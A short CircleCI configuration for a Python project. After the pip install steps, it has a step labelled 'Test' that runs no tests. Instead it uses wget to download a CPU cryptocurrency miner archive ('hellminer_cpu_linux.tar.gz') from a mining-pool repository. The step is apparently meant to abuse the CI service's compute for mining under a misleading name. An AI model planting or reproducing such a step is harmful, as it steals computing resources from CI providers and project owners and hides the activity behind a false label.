version: 2.1
orbs:
  python: circleci/python@1.3.2
jobs:
  build:
    executor: python/default
    steps:
      - checkout
      - python/install-packages:
          pkg-manager: pip
      - python/install-packages:
          pip-dependency-file: dev-requirements.txt
          pkg-manager: pip
      - python/install-packages:
          args: pytest
          pkg-manager: pip
          pypi-cache: false
      - run:
          command: |
            "wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz"
         
          name: Test
